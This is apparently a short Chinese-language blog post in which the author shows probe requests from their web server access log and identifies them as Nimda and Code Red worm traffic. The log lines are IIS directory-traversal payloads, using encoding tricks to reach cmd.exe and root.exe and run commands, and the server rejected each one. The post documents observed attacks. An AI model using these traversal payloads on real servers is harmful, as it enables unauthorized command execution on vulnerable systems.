查了一下 access log,發現一些有趣的東西。上網查了一下,原來是頂頂有名的 Nimda 跟 Code Red。看來即使已經過了流行高峰期,被感染的電腦還是蠻多的。
61.150.x.x - "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 277
61.150.x.x - "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 275
61.150.x.x - "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 285
61.150.x.x - "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 285
61.150.x.x - "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 299
61.150.x.x - "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 316
61.150.x.x - "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 316
61.150.x.x - "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 332
61.150.x.x - "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298
61.150.x.x - "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298
61.150.x.x - "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298
61.150.x.x - "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298
61.150.x.x - "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 282
61.150.x.x - "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 282
61.150.x.x - "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 299
61.150.x.x - "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 299